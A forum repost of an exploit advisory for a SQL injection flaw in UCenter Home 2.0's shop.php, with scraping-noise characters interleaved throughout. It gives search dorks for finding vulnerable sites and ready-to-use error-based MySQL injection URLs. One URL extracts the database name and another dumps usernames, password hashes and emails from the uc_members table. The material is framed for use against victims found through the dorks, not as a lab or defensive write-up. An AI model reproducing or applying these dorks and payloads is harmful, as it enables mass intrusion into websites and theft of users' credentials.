中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]

作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
5 L$ L6 z# r) }4 K5 h# Z2 X) I
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  5 U) H$ _) A, p% ?
2 a$ y  d9 S) ~! h! N0 B
                                 
4 x1 c0 ]! ]$ u/ p8 N) r, `1 n
; r! F4 ~- e; D' w$ V9 D*/ Author : KnocKout  2 a$ U" E) g3 k( p* t1 [; V9 x
8 q7 {! b+ V, k) s! K
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
, |6 I& D) ~' a$ A8 g  Y9 r  w; p# S. s1 P/ r1 g; h, R
*/ Contact: knockoutr@msn.com  
" S& j2 Z7 R$ n" M6 O
* O7 U$ }  i2 B) z) a! D$ @*/ Cyber-Warrior.org/CWKnocKout  
+ \8 _3 J& C" S9 Z# S5 K- r2 t) \- c4 D+ k* y, E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
2 q7 D9 R0 w' W* t1 S. s( M- g0 X) Y1 T
Script : UCenter Home  
7 B( `+ M% M' B. d7 T
; A4 F" C% z6 }) F: ], EVersion : 2.0  3 X* N0 c7 z7 I# w7 i7 O

! k  |" Q9 ^4 m0 K% rScript HomePage : http://u.discuz.net/  / \* |. W/ q5 D8 M) `8 F" q

5 U' d+ R) S, d  M, D5 K- {__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  9 ^! W" W2 f! H# x1 ?, H4 I& x

9 O3 T3 i" e! M& C- v# a( V" {Dork : Powered by UCenter inurl:shop.php?ac=view  
, i: ^3 |, X$ M9 t( z( V2 _$ ^9 g4 \
  m+ E; ?" v3 |2 n9 V9 pDork 2 : inurl:shop.php?ac=view&shopid=  # Y8 _% l5 e& l- L
' E9 `2 q0 n* O  }
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
7 p8 A% @4 t4 ]4 t- \% e
& k; u6 ?% `0 Y: SVuln file : Shop.php  
3 C0 D0 K8 t5 g! q! P% l; f5 \4 }
4 |9 g+ K* [0 G/ j5 m" i3 J, ]value's : (?)ac=view&shopid=  ! d9 t4 B+ i) @9 D
6 N! p$ s9 y0 u2 E, H5 z9 h8 y, Q
Vulnerable Style : SQL Injection (MySQL Error Based)  5 C4 g1 o7 V1 M; o  S: w
# E) [- K: i0 [+ b, ~3 \- U) x8 i
Need Metarials : Hex Conversion  + r2 \! L$ s) Q1 [) X1 l

1 W8 p. _. w0 X' t9 U3 I; X! ^__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
* b7 Q7 b$ a" I& `) t: g* o  V
, m" M; T! `' X+ z" D# kYour Need victim Database name.   ' h9 h; v- f) K

1 r6 [0 D8 Z: F7 j$ ~& e8 Xfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + L& P, v) w; ?* t% v9 W! z: [

: f' v  G5 w  @- X/ r..  % I& \( h7 J/ l. F) q' f  v
% Y8 i1 m8 K8 i8 o9 A$ E
DB : Okey.  2 l. J! ]* L6 Y6 O8 @) X
) l4 \. g% }* h0 p
your edit DB `[TARGET DB NAME]`  
1 C) v4 D$ w' R4 U" S8 Y, F9 O8 X# S7 k: |
Example : 'hiwir1_ucenter'  
3 e! r# f& x; O) L! k, K5 h' T/ ], f  r1 G2 s. ~' ]
Edit : Okey.  + \+ s7 Z  y+ P; f" u' r4 d5 d
2 q: v$ `* ^* V
Your use Hex conversion. And edit Your SQL Injection Exploit..  
- ^, B: ?8 Q0 J; P. C8 ~3 A  J  g! Z" V: t: @- Q1 [2 J5 f8 `& Y# U
   
& |( p+ H* g; ~
1 v, |# z. L; F9 |+ M* ~  BExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  4 B0 G" ~6 B3 ~" H8 }% b





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2